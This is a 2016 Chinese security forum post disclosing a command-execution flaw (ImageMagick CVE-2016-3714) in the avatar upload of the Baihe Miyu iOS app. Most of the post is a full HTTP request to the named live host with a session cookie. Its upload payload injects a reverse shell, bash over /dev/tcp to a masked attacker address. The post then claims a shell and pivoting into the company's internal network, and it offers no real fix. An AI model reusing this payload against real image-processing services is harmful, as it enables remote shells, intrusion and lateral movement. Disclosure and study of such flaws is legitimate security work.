HanDs
管理员

[7月漏洞公开] 百合某站一处命令执行/轻取百合内网 



详细说明:

目标:百合密语IOS APP

检测发现在头像上传处存在CVE-2016-3714 - ImageMagick 命令执行

code 区域
POST http://miyu.apps.ibaihe.com/user/update HTTP/1.1
Host: miyu.apps.ibaihe.com
Content-Type: multipart/form-data; boundary=Boundary+21678AD4911AD07A
Cookie: SESSIONID=8A599FECF109036CF707D19BCF8F0A8A7E3809B8C2B84839E3C1AC204E3F0640EAAF21A8534AB4048BBDA6AF5A7D2456A41ACE153F7D435B7D1A9A01C1FDD016CECC60F99738981F657CA808FA71C17F6A8E20E1D5D2ED2CDFBAC1DE748EDF54
Connection: keep-alive
Connection: keep-alive
Accept: */*
User-Agent: BHMY/1.4.6 (iPhone; iOS 9.3.2; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9
Content-Length: 841
Accept-Encoding: gzip, deflate

--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="avatar"

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'
pop graphic-context
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="channel"

iOS||iOS_9.3.2||AppSotre||iPhone 6s||Apple
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="listener"

0
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="version"

1.4.6
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="avatar"; filename="2016-06-03-20-49-04-0.jpg"
Content-Type: jpg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'
pop graphic-context
--Boundary+21678AD4911AD07A--

漏洞证明:

反弹shell

id.jpg



hostname.jpg



ping下百合主站,发现已进内网

ping.jpg



ifconfig.jpg

修复方案:

请多指教~


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
百合 夏痴疽 γ
#1楼
发帖时间:2016-7-19   |   查看数:0   |   回复数:0
游客组
快速回复